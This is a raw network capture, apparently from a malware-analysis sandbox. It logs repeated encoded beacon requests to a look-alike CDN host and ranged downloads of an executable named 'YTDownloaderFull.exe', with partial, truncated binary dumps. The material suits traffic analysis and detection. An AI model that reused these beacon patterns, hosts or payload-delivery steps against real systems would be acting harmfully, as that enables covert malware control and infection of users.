Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /14314.ashx?e=2fVCHF6kf8jCiOnT8Um5ojRFyso9cgVY/xQAo/408bbCigHpURgZKxfMv/l 8Q4Wfl0yK7ww8bQbTivYZlBvEDiTgabm 9Kyo8M2vrtdlce0WSiJ16upXTcGS76lfQpPfkKZPeLk1IXa8iDQLHG9ikTL6x/aszFCRyUoQuKpbN1YtrOl7BfDWDz0zfD6NQ4eEwAaRG2pHiUPesst1ukiDgCtEn0QpjuXhJ1Bh5YeUQcklpIg/vGiFhQGw7w7bWmjz7d9KaLD84/d0InrHGn4CTEJJ99zQJTqVYgO0yHAHEsYAqi 8bJ4kL0puLqbigJGKotwKW5Oqogj9wXQw f3NHANGpOWwcxYTkg3eP0fa/4= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK

Date: Thu, 10 Sep 2015 07:25:38 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /14314.ashx?e=2fVCHF6kf8jCiOnT8Um5ojRFyso9cgVY/xQAo/408bbCigHpURgZKxfMv/l 8Q4Wfl0yK7ww8bQbTivYZlBvEDiTgabm 9Kyo8M2vrtdlce0WSiJ16upXTcGS76lfQpPfkKZPeLk1IXa8iDQLHG9ikTL6x/aszFCRyUoQuKpbN1YtrOl7BfDWL9PKObAHk8Ms IILilpWF0oVqJUL9ojcMbrniShQ3GQLdA rHOtLvrw1VxvH51bFJF4kQIHXTAmjFaC1iN6TTGCGrpHNYuwVpXZrelYJPLUrmhU/capljenNguChnjFYxzmkHxvj2IRXcgr8gwCjoRxb8Oz3Nykvipxs5XxNmVl HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK

Date: Thu, 10 Sep 2015 07:25:38 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /14314.ashx?e=2fVCHF6kf8jCiOnT8Um5ojRFyso9cgVY/xQAo/408bbCigHpURgZKxfMv/l 8Q4Wfl0yK7ww8bQbTivYZlBvEDiTgabm 9Kyo8M2vrtdlce0WSiJ16upXTcGS76lfQpPfkKZPeLk1IXa8iDQLHG9ikTL6x/aszFCRyUoQuKpbN1YtrOl7BfDWI5PPWYBcW8Gs IILilpWF3nW9YwSk5gj28Va7JmIs/Bl13yhrpfYAMeIGfrzyWRyvy2gKbXyPPDXUoXAX2Uiz3W6sPFKrniCyxamEHwe AYLkxhdnC/RJrb4ZR 6izXtqnDUZD3eCjLyi7SKmc/IBwLgrSkZSFaNnd/rihenux9DwqPoy7y/e9FgAYD7IlOOSp LYLDcsF6Odloy4EgwsaMMPQ SS4HkA== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK

Date: Thu, 10 Sep 2015 07:25:39 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /14314.ashx?e=PcwT4QFtuPDEA05CBT6a0a4CrgF/oVkXhiJeNe9dCpGmy6t0 u4xzf2TEkHeJNDU8E2Pd9CMWosSO5u5UlyZGWbY4wRb3lZ/Lhu0b45kiT/XpciovEgse2DHUe356ADpreizXIw2lEXuAG0Hn6RhSl2loKLeLycAJJaSIP7xohYUBsO8O21po8 3fSmiw/OP3dCJ6xxp AmkdnXmY5ntEg== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK

Date: Thu, 10 Sep 2015 07:25:39 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /14314.ashx?e=WVbe3wHlwMEinMwQKODRlCGn4C mEEfxIM0CqmsRfbtxTYwWxYG9WEEY41XBMtFk/h9mchShIbSrOSgjjO/wQWUl0xzv/1Q131fTgrR12XxM0RSkMVjMOymF904v4t2DZ0d7GEGeHAhiVQeEeICkE1 gAUOMZfgulwJkQAVG5kmEQOVvkS6cCKC4/FjewiPFmOdeW8Cm Pw= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK

Date: Thu, 10 Sep 2015 07:25:39 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /14314.ashx?e=2fVCHF6kf8jCiOnT8Um5ojRFyso9cgVY/xQAo/408bbCigHpURgZKxfMv/l 8Q4Wfl0yK7ww8bQbTivYZlBvEDiTgabm 9Kyo8M2vrtdlce0WSiJ16upXTcGS76lfQpPfkKZPeLk1IXa8iDQLHG9ikTL6x/aszFCRyUoQuKpbN1YtrOl7BfDWA5Mtw6p9U5dKYX3Ti/i3YNxO48S9k5zx0ojLX6lvBJsJJaSIP7xohYUBsO8O21po8 3fSmiw/OP3dCJ6xxp AkxCSffc0CU6lWIDtMhwBxLGAKovvGyeJC9Kbi6m4oCRiqLcCluTqqII/cF0MPn9zRwDRqTlsHMWE5IN3j9H2v HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK

Date: Thu, 10 Sep 2015 07:25:39 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /14314.ashx?e=Qoli4LW15gtmS6nlSU/NTiWcJxQhCNYt/ToTRiVFxVR2M5d6UDxIvpDKf9AB8lI7SlCyq068/M1FOTAwlw8YF8d71y2H I42iBFaADrPTvGxo tMAskzj3wF8xC533Fc8E2Pd9CMWosSO5u5UlyZGWbY4wRb3lZ/Lhu0b45kiT 2Xfi4eCjhjMjKRY6Iofb7pjurIyC9QLCNmnPWw9zGnUjefKmcoAknBKVVzEMwyJ3sIbAGqmciw6mj USOl4CUHMVy4A0ZhyzpBU9U/r/dsNyvhlGeipNVNIPaRbv9tSE6xlJd0h7/gd1mHzxcGoQX HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK

Date: Thu, 10 Sep 2015 07:25:39 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /14314.ashx?e=/9ZmISdorEsAVnWQbAnLWDRFyso9cgVY/xQAo/408bbCigHpURgZKxfMv/l 8Q4Wfl0yK7ww8bQbTivYZlBvEDiTgabm 9Kyo8M2vrtdlce0WSiJ16upXTcGS76lfQpPfkKZPeLk1IXa8iDQLHG9ikTL6x/aszFCRyUoQuKpbN1YtrOl7BfDWM xh4nuC6oveZAqHIGghM2z4gguKWlYXaO/XErhxliTI9uQqrKZfxIBT7frdp7JezUCjI61UkiTnkgV 4XZT5z4ClmOKwA5tjnHHb7mscIVgbV/yvdriMjwaA8tF5WGLnyvcuu3n6aLNNw5 xDHzYgoVew2AB1B6dSM4OFarGdJKBIumnxm9gbppvl9R6 WhvM9KvXHlNP117c3Fngy/YiYglFcV1P8JUJcm/l/xEvxA6V8R1oJo7qvahkwjxcRjGnDU1S tLbCq4B1iQWYNnk5MTeqccPPQKdfW31f15HrC/m74 efuIFAjghhbsGXAob/z4gt3huKFFb4kQKLOKLSjoKcRHF JjlkwUaFySc/6ysA rfm9WUeI9VTThLJ3QUOVwUN6qMm8gbXZsuvvibpKDN532NTcbDfhe8VxCPz HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK

Date: Thu, 10 Sep 2015 07:25:40 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /14314.ashx?e=/9ZmISdorEsAVnWQbAnLWDRFyso9cgVY/xQAo/408bbCigHpURgZKxfMv/l 8Q4Wfl0yK7ww8bQbTivYZlBvEDiTgabm 9Kyo8M2vrtdlce0WSiJ16upXTcGS76lfQpPfkKZPeLk1IXa8iDQLHG9ikTL6x/aszFCRyUoQuKpbN1YtrOl7BfDWA2yDM6d7piii11NaYYxcNku1SXIq07tJg ABjx4/MVnPaT JG0G pPE0H2E /K1uqPiYRVVMKy/yijAfjje/ktUzPMZleL5 Wu7K8cv9dNF9NtefOTH4Uod212AYeRmsjiTgabm 9Kyo8M2vrtdlce0WSiJ16upXX7cxyy4Xhwh HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK

Date: Thu, 10 Sep 2015 07:25:40 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /14314.ashx?e=/9ZmISdorEsAVnWQbAnLWDRFyso9cgVY/xQAo/408bbCigHpURgZKxfMv/l 8Q4Wfl0yK7ww8bQbTivYZlBvEDiTgabm 9Kyo8M2vrtdlce0WSiJ16upXTcGS76lfQpPfkKZPeLk1IXa8iDQLHG9ikTL6x/aszFCRyUoQuKpbN1YtrOl7BfDWKv9x4TEPS62BPEhRyyBD7DR614fwrEG1qQdf661A7a3sYns0spGP2dTvMZjEVVmTm 4 SQMoieQ8Lxp8HLogowR591rTzu05D5OeSwUDdva2hNibsqR5hVlUrzhzYzRp7 srzHUOTm5Cd3FHp 6lvDMpb3phhqpJJEKkB5GbhZH HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK

Date: Thu, 10 Sep 2015 07:25:40 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /14314.ashx?e=/9ZmISdorEsAVnWQbAnLWDRFyso9cgVYckYBBdXIKfLCigHpURgZKxfMv/l 8Q4Wfl0yK7ww8bQbTivYZlBvEDiTgabm 9Kyo8M2vrtdlce0WSiJ16upXTcGS76lfQpPfkKZPeLk1IXa8iDQLHG9ikTL6x/aszFCRyUoQuKpbN3VAezdf3aKUZ1oPXyDmfKJGv4KmdiE6A0YxIyJifn4/20i04rg0GqU6QUZ3iN538P2DINu3lc8z4xvUpY0xunjjZpz1sPcxp1I3nypnKAJJwSlVcxDMMid7CGwBqpnIsOpo/lEjpeAlBzFcuANGYcs6QVPVP6/3bDcr4ZRnoqTVTSD2kW7/bUhOsZSXdIe/4HdZh88XBqEFw== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK

Date: Thu, 10 Sep 2015 07:25:40 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /14314.ashx?e=M7A8vgjJHrjHEQ/kk/2L9nRyfx22RDGQOvHY8s4Kk0v UINFgbXOioSHumzRJDsRjOluN4MfK82okOeVQ5E0okWABgPsiU45Kn4tgsNywXo52WjLgSDCxhB4JTca9qTJ6tXJoxLUCgFVyxmCM5MsGKDVUCx/QWZiGGOhdsvITwV195BE3C 03zdJAJ5fHVMItQhIsImUWq6XgKdYL4Li8dDmJkgzV7sEdFuCUHWPT9JluevdybjIM/AF/Crll2X X6ABQ4xl C6XAmRABUbmSYRA5W RLpwIoLj8WN7CI8VJWpTUhdoetbAQhJgQ701LudQlG124a8hFOTAwlw8YF8d71y2H I42iBFaADrPTvGxo tMAskzjw== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK

Date: Thu, 10 Sep 2015 07:25:41 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /14314.ashx?e=N6dOqWm8Q94fEbCpbJoCfnRyfx22RDGQOvHY8s4Kk0v UINFgbXOioSHumzRJDsRjOluN4MfK82okOeVQ5E0okWABgPsiU45Kn4tgsNywXo52WjLgSDCxhB4JTca9qTJ6tXJoxLUCgFVyxmCM5MsGKDVUCx/QWZiGGOhdsvITwV195BE3C 033SOzT6mB7 gBPEhRyyBD7D9H9 R1sVvTizl8eRMdimuBHdyxBIzcuHESN9FFCantS5MYXZwv0Sa2 GUfuos17apw1GQ93goy8ou0ipnPyAcC4K0pGUhWjZ3f64oXp7sfQ8Kj6Mu8v3vRYAGA yJTjkqfi2Cw3LBejnZaMuBIMLGjDD0PkkuB5A= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK

Date: Thu, 10 Sep 2015 07:25:41 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

HTTP/1.1 200 OK..Date: Thu, 10 Sep 2015 07:25:41 GMT..Content-Length: 
0..Connection: keep-alive..Cache-Control: private, no-store..X-AspNet-
Version: 4.0.30319..X-Powered-By: ASP.NET..Server: NetDNA-cache/2.2..X
-Cache: MISS......

GET /14314.ashx?e=AmLJM6c3sNcinMwQKODRlNMKbKv8c5VnIM0CqmsRfbs08bEgFRb3JLee7JGyVH1lRdb/S8YKHkPcr4ZRnoqTVTSD2kW7/bUhOsZSXdIe/4HpS5W6ywluOr7GRIcOoydhUdGPD1b2Qs4hf6pZ97v1E3PTyAJF5AGGpjkZwwc6dH4myeS/0faBVTdVMo67fxO0s IILilpWF0ZnIhubsYOdECOCGFuwZcChv/PiC3eG4oUVviRAos4otKOgpxEcX4mOWTBRoXJJz/rKwD6t b1ZR4j1VNOEsndBQ5XBQ3qoybyBtdmy6 JukoM3nfY1NxsN F7xXEI/M= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK

Date: Thu, 10 Sep 2015 07:25:42 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /14314.ashx?e=AmLJM6c3sNcinMwQKODRlNMKbKv8c5VnIM0CqmsRfbs08bEgFRb3JLee7JGyVH1lRdb/S8YKHkPcr4ZRnoqTVTSD2kW7/bUhOsZSXdIe/4HpS5W6ywluOr7GRIcOoydhUdGPD1b2Qs4hf6pZ97v1E3PTyAJF5AGGpjkZwwc6dH4myeS/0faBVTdVMo67fxO0s IILilpWF2Et8EPpFBXSUCOCGFuwZcChv/PiC3eG4oUVviRAos4otKOgpxEcX4mOWTBRoXJJz/rKwD6t b1ZR4j1VNOEsndBQ5XBQ3qoybyBtdmy6 JukoM3nfY1NxsN F7xXEI/M= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK

Date: Thu, 10 Sep 2015 07:25:42 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /14314.ashx?e=GFrjZskQvqNmS6nlSU/NThXyJo8GcS5h/ToTRiVFxVR2M5d6UDxIvpDKf9AB8lI7SlCyq068/M1FOTAwlw8YF8d71y2H I42iBFaADrPTvGxo tMAskzj3wF8xC533Fc8E2Pd9CMWosSO5u5UlyZGWbY4wRb3lZ/gFOqBGDQz2TLS8QKBdwSe29z1KklHinBKYX3Ti/i3YMgCmKZYKupqaMfrJi9XFVPBHdyxBIzcuFiQ3FzN41YlI2ac9bD3MadSN58qZygCScEpVXMQzDInewhsAaqZyLDqaP5RI6XgJQcxXLgDRmHLOkFT1T v92w3K GUZ6Kk1U0g9pFu/21ITrGUl3SHv B3WYfPFwahBc= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK

Date: Thu, 10 Sep 2015 07:25:42 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /14314.ashx?e=AOb NGCDna90cn8dtkQxkERusJn/tOCq/lCDRYG1zoqEh7ps0SQ7EYzpbjeDHyvNqJDnlUORNKJFgAYD7IlOOSp LYLDcsF6Odloy4EgwsYQeCU3GvakyerVyaMS1AoBVcsZgjOTLBig1VAsf0FmYhhjoXbLyE8FyBfkdHFoABfEKmHddSTlr6/u6Si5KcyuceLsPpRf2XIu YgVzu615FhjFLtNp8mV2lEuQvGIR/fg8uwYzFR1r8TQfYT78rW6o JhFVUwrL/KKMB ON7 S1TM8xmV4vn5a7srxy/100X021585MfhSh3bXYBh5GayOJOBpub70rKjwza u12Vx7RZKInXq6ldftzHLLheHCE= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK

Date: Thu, 10 Sep 2015 07:25:42 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

HTTP/1.1 200 OK..Date: Thu, 10 Sep 2015 07:25:42 GMT..Content-Length: 
0..Connection: keep-alive..Cache-Control: private, no-store..X-AspNet-
Version: 4.0.30319..X-Powered-By: ASP.NET..Server: NetDNA-cache/2.2..X
-Cache: MISS......

GET /14314.ashx?e=bNFVvuIwcz4inMwQKODRlIqiqZmwl1PqIM0CqmsRfbs08bEgFRb3JLee7JGyVH1lRdb/S8YKHkPcr4ZRnoqTVTSD2kW7/bUhOsZSXdIe/4HpS5W6ywluOr7GRIcOoydhUdGPD1b2Qs4hf6pZ97v1E3PTyAJF5AGG Ruf1p/wWfUh 3ZGDmdW5pZis9f nTddyS4BuUDC9WTdXgG3d7dLtc8OkZQyb4w969Wi5JdYQNAjghhbsGXAob/z4gt3huKFFb4kQKLOKLSjoKcRHF JjlkwUaFySc/6ysA rfm9WUeI9VTThLJ3QUOVwUN6qMm8gbXZsuvvibpKDN532NTcbDfhe8VxCPz HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK

Date: Thu, 10 Sep 2015 07:25:44 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

HTTP/1.1 200 OK..Date: Thu, 10 Sep 2015 07:25:44 GMT..Content-Length: 
0..Connection: keep-alive..Cache-Control: private, no-store..X-AspNet-
Version: 4.0.30319..X-Powered-By: ASP.NET..Server: NetDNA-cache/2.2..X
-Cache: MISS..

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=0-249999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: otr4vhc-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Thu, 10 Sep 2015 07:25:42 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: rn0VRtdeG9nkrztNNzmx8YG8CG7ulaNReolj026ah6zwbyRI8wwaZog4JLF9ttcv

x-amz-request-id: A7561DB98695E903

Last-Modified: Wed, 09 Sep 2015 09:54:13 GMT

ETag: "5d669deb08c6a6c70fd2bc96b3af38ac"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 0-249999/5107690
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..i
u..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L.....
oS.................\...........2.......p....@.........................
.................................................s....................
...................................................................p..
.............................text....[.......\.................. ..`.r
data.......p.......`..............@[email protected]..........
[email protected][email protected]
..............@..@....................................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U....\.}..t .}.F.E.u..H...
[email protected]@..e...E..E.P.u....r@
..}[email protected]... M.......M....3.....FQ.....NU..M.....
.....VT..U.....FP..E...............E.P.M...Tp@[email protected]
....E..9}[email protected].}.j.W.E......E.......@[email protected]..
[email protected]<[email protected] [email protected]...\r@._
^3.[.....L$...7B...Si.....VW.T.....tO.q.3.;5.7B.sB..i......D.......t.G
.....t...O..t .....u...3....3...F.....;5.7B.r._^[...U..QQ.U.SV..i.<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=500000-749999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: otr4vhc-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Thu, 10 Sep 2015 07:25:42 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: rn0VRtdeG9nkrztNNzmx8YG8CG7ulaNReolj026ah6zwbyRI8wwaZog4JLF9ttcv

x-amz-request-id: A7561DB98695E903

Last-Modified: Wed, 09 Sep 2015 09:54:13 GMT

ETag: "5d669deb08c6a6c70fd2bc96b3af38ac"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 500000-749999/5107690
.....=...::.........Q&.U .F....7%B.n.[$....XA..('t....RFd.........|sja
..Y..$../..1. .s{.0..H..'.F..`..Z}..w_.S.-zV...n3...$....3.("....(R..?
.y9...................9Q.....9.Y7j...=...H....j.vLD....x.=..k0 .k..1.t
k.H~.T?b..A..Y..&.2..%..~`.x..C.F.eY....C.....U....C....jR... ..!.H...
.hc....^..3...P.^..O}.f.3...o,..<.C..? ...~.K.....xi.\1...1...S...y
S.'..........~.... ........ .e....Z..BLE...........(xIQ..:......m-)...
]....Jh....=".Fy&.c..8.!.F.w.z.x.....9..2.......).}...0.....Z.l.....Xw
._..e...Z7oN.!....J.........oB..Qu.... .Q...........l4.9bvv.. .-^....K
.%...t1Q9....(..B.^.[..GR."..I.:.e.Hv..J..u..9.....k...u..U...Z..a....
.;....Jv...#(...9,..Kf...&....8.....mx."..fdR^".9.O..hq..b.b>8.D..{
5.q.....XU.ah.=..BI. . ..%.....y.......k.......D.Oir-.2.x..u8b..l...TG
..j....B.nZg..5....B....'.4f.|9..........}.../../,..I..g."t..Q..m(....
..k..>.._...........k........{Yq.Ue.W....w.'UF.zp.W=..o$(....5.....
g...(p..tx..f......sB?.....U.K.a......./.ic.kL,.jz.0..V"..B...%[.....%
...R!._.01.........{..z....Uy.. j..MqQ..'-.6..u......c'[>^....<.
U.W...`x..:..9E......h...VlI....K......er=..Y-.........?.'1..K...O...b
...J.........;.....7..._SNC...{..J..`.\t.I.?. TM.33......`...=X....7l.
6./..`{...0..@.....](J..#...).....x.....Rgh.<}Yazf<C.%...K~.....
H.d..x..........{....D.h...e.... 0 .x...v..I... 1{J....qON.... 9.../..
.W..<..x.. 5k,...Y...-.../^=.X.kl1\0..].....Z.._w...|R.[....Y..y..k
..0....D.f..bUH.A.S.r.c..d..u....h...SmRII #..D. D'a..-......Oh...n...
.>wm~. ..#F...bG.lC.m..c............Z.......OC..b....>....{.<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=1000000-1249999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: otr4vhc-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Thu, 10 Sep 2015 07:25:42 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: rn0VRtdeG9nkrztNNzmx8YG8CG7ulaNReolj026ah6zwbyRI8wwaZog4JLF9ttcv

x-amz-request-id: A7561DB98695E903

Last-Modified: Wed, 09 Sep 2015 09:54:13 GMT

ETag: "5d669deb08c6a6c70fd2bc96b3af38ac"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 1000000-1249999/5107690
..=.t...._.)..^.....TZf...}.......a?.6z.......*..7.Xx...r5.zn.W4.G../N
&..*......I2..i.E|TH...?5...sM.Z.{.. -w.2..t.".............E.......0..
..8B....o.....!.rMb<.W.FQ2..Z.....`.........@;BD....u;.|.....4.X..*
......G4 =z.s/..g...J.....P.\p...J.q...`.....=.a..H.....r....Jh.......
^.p..$..`..b.R..el.}.{.J.......Fl[.......W......N..............:.`.d..
.D.c...._h.z&...2G].S....1......yf.........V [email protected].].X
^.W..7S.3. .W..(.. &.Lv). l.Iy...z-.]L.<[email protected]...*.W...
.Q.,.7Gpb.....ia......g...\.F(0k..........Q...../s...G.....d.a.e...7U.
[email protected].:.>V9K..V0.N....<.}Jf51.oPLL.:.,
.p..9..yv..!..Eb9.T.....u.......o.m.....%...i.g...G..6.....j."..._s'..
..S.Y|.M.r..h...k.. ....N)....P..Y.@..)IbeY....m...4..*..~............
@@g..9$ .....X..1..B.U....a3..Gr.*2..E.........<....\..u`.......-.h
4-...i..;.g.p...-h.h/.....]............1.I.2......1....Z(...p..,......
(..E.`.........1.yu..E..}c..tLO.YL....Y.`.A.T...3.......!...m.(`in...6
..c$..)[email protected]....<h..L.#..0K.....^....C.
*&...x...x..........).....k.....g..v"...ph%.b..N.........:&%.M.V^..|..
.x[.'U.......c.x>>.;:..4....I4Y.v..K[.U...E2....1\........./J!..
.....Fk.1...p....P...^..d...9.Tcw.}..U1..=w....H=r..e.......Q..$..Na..
. ....2r.:."m..Nu".B..%%..lKd.......N*S7'.8>"jr......\=.0. ...M>
W...5.J...#..Hp....i.yz.C..Z..._n{P.X..~.UNq.w...H.Bt>."..1yF,...Q.
....r|M..&..{.../..`..(.|.s.....G/.o..r.....g-`Y...b.:.R..RKU.........
Z.q.e..j..4...&...1.g'A.D..DK..._..................|.V}*)-.9'.[.).<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=1500000-1749999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: otr4vhc-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Thu, 10 Sep 2015 07:25:42 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: rn0VRtdeG9nkrztNNzmx8YG8CG7ulaNReolj026ah6zwbyRI8wwaZog4JLF9ttcv

x-amz-request-id: A7561DB98695E903

Last-Modified: Wed, 09 Sep 2015 09:54:13 GMT

ETag: "5d669deb08c6a6c70fd2bc96b3af38ac"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 1500000-1749999/5107690
N.5P.......)Mc....*A....Jn.....J...i*n.F..w..,)..0...[3...F0.......m=.
.t2=T[..%.6...........a});J..y....:{8......m../"W.}..)..6..w..b.."....
L.... .=..Y.[%..>.._g\&.../";..p..".-..........f..v@. J.."......]c.
......u.l..M...........[L9..... ....#..q_.b(%.6..X....~. .....J.f.....
A...ek.\.......3.}..... u.%\.....}.g...,C.Z.If..._b..f.......n....... 
=..7L..OG!.W...\A...k.dj....^Y.......v...........D..;.p..s..y:.%[email protected]
....lql.r..s..)W2.v...o....>...UE'e......=.....v..a#X.C.]qa....H..^
)....S....&j0.......r..}..]2.. :[email protected]....\H...s.j.A......K....U]..$H7
H....].I*..........V3....([email protected].#.;r.p1\."....L.4.T...)..h.<....
... '`3....5&O...<..z..h..9....N*..b......e.....0<.........D...!
. .l....#.A{..-.b2>O....B/..b.oN)....^..52.A.W...4.........7...%^.x
.H...!al..0Z.j....x...G......(..:...N..:.......:...aR...w..n...1TW....
2~}..Xx...p....t..B..<..]......Bp...bp..?.&......$..R."]....^I.....
